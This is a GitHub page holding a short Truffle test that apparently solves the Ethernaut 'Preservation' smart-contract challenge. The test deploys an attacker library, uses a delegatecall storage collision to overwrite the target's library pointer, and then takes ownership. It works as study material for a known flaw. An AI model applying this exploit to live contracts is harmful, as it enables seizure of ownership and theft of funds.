-
Notifications
You must be signed in to change notification settings - Fork 6
/
preservation.exploit.js
36 lines (28 loc) · 1.52 KB
/
preservation.exploit.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
const assert = require('assert');
const Preservation = artifacts.require('Preservation');
const PreservationAttack = artifacts.require('PreservationAttack');
const LibraryContract = artifacts.require('LibraryContract');
contract('Preservation', function ([_, owner, attacker]) {
beforeEach(async function () {
this.firstLibrary = await LibraryContract.new({ from: owner });
this.secondLibrary = await LibraryContract.new({ from: owner });
this.contract = await Preservation.new(
this.firstLibrary.address,
this.secondLibrary.address,
{ from: owner }
);
});
it('passes the challenge by overwriting storage and pointing to attacker-controlled library', async function () {
assert.equal(await this.contract.owner(), owner);
// Deploy malicious library
this.attackerLibrary = await PreservationAttack.new({ from: attacker });
// Overwrite first storage slot, changing timeZone1Library to attacker-controlled address
await this.contract.setFirstTime(this.attackerLibrary.address, { from: attacker });
assert.equal(await this.contract.timeZone1Library(), this.attackerLibrary.address);
// Call first library, which should be attacker-controlled contract by now
// Value sent as parameter won't be actually used, so it can be any number
const anyValue = 0;
await this.contract.setFirstTime(anyValue, { from: attacker });
assert.equal(await this.contract.owner(), attacker);
});
});